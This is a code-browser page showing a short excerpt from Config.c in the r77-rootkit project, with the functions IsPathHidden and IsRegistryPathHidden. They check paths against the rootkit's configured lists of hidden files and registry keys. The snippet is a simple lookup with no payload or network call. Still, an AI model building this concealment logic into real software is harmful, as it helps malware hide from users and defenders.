MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / IsPathHidden

Function IsPathHidden

r77/Config.c:66–69  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

64 }
65}
66BOOL IsPathHidden(LPCWSTR path)
67{
68 return Configuration && StringListContains(Configuration->HiddenPaths, path);
69}
70BOOL IsRegistryPathHidden(LPCWSTR path)
71{
72 return Configuration && StringListContains(Configuration->HiddenRegistryPaths, path);

Callers 2

Calls 1

StringListContainsFunction · 0.85

Tested by

no test coverage detected